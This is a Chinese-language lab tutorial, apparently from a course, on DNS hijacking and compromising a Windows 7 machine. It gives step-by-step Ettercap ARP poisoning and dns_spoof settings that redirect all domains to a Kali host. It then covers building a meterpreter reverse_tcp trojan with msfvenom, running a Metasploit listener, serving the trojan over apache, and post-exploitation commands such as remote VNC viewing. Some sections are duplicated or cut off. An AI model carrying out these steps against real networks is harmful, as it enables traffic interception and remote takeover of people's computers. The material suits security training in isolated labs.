Day 3 DNS劫持
DNS
一、什么是DNS
在网络中,机器之间只认识IP地址,机器之间最终都要通过IP来互相访问。但是为了方便记忆,可以为IP地址设置一个对应的域名,通过访问域名,就可以找到对应IP地址的网站。
2. 环境搭建
2.1. 环境介绍
| 主机 | 系统 | IP地址 |
| 攻击者 | Kali-Linux | 192.168.83.11 |
| 目标机 | Windows 7 | 192.168.83.39 |
主要使用的技术是 kali 的 Ettercap 工具
2.2. 环境准备
确保80端口没有被任何程序占用,如果有程序占用,则根据PID结束进程

- 开启端口转发
在root权限下才能修改成功,将 ip_forward 修改为 1
echo 1 > /proc/sys/net/ipv4/ip_forward
- 开启apache2
service apache2 restart
- 测试 apache 服务器是否开启
在 kali 的浏览器中输入 kali 的 ip

- 查看本机ip
ifconfig
fconfig
- 修改 etter.dns 将目标改为本机 ip
sudo vi /etc/ettercap/etter.dns

* 匹配所有域名转发到kali身上
ip 为 kali 自己的 ip
3. 开始攻击:
-
搜索ettercap进入

2.进行搜索

3.添加攻击目标


4.选择ARP

- 进入菜单找到Plugins,再展开Manage plugins后选择dan_spoof双击一下



- 通过CMD查看百度的IP地址是多少输入
ping www.baidu.com 发现百度ip与kali的ip一致则说明拦截完成

- 访问百度页面,跳转到指定界面说明劫持成功

4. kali入侵windows
4.1. 生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe x>木马文件.exe

4.2. 配置并启动监听
- 修改 etter.dns 将目标改为本机 ip
sudo vi /etc/ettercap/etter.dns

* 匹配所有域名转发到kali身上
ip 为 kali 自己的 ip
kali入侵windows
1.生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe x>木马文件.exe

2. 配置并启动监听
2.1 启动msf
msfconsole

2.配置模块
use exploit/multi/handler

3.选择攻击模块
set payload windows/meterpreter/reverse_tcp

4.配置 IP
set LHOST <IP

5.配置端口
set LPORT <端口>

6.查看配置参数
show options
7.后台运行
exploit -z -j
- 配置 IP
set LHOST <IP>
![]()
- 配置端口
set LPORT <端口>
- 查看配置参数
show options
- 后台运行
exploit -z -j

- 直接执行监听
run

4.3. 上传文件
- copy 文件至网站服务器
cp 文件 /var/www/html

- 开启服务
service apache2 start

- 靶机获取文件
<IP>/文件名

4.4. 等待靶机上钩
- 查看上钩的用户
sessions

- 选择攻击的用户
sessions -i 用户编号

5. 攻击命令
5.1. 监控靶机屏幕
run vnc -i


5.2. 实时观看远程用户桌面
5.3. 抓取交互式桌面屏幕截图
5.4. 录音
5.5. 播放波形音频文件
5.6. 打开记事本
execute -f notepad


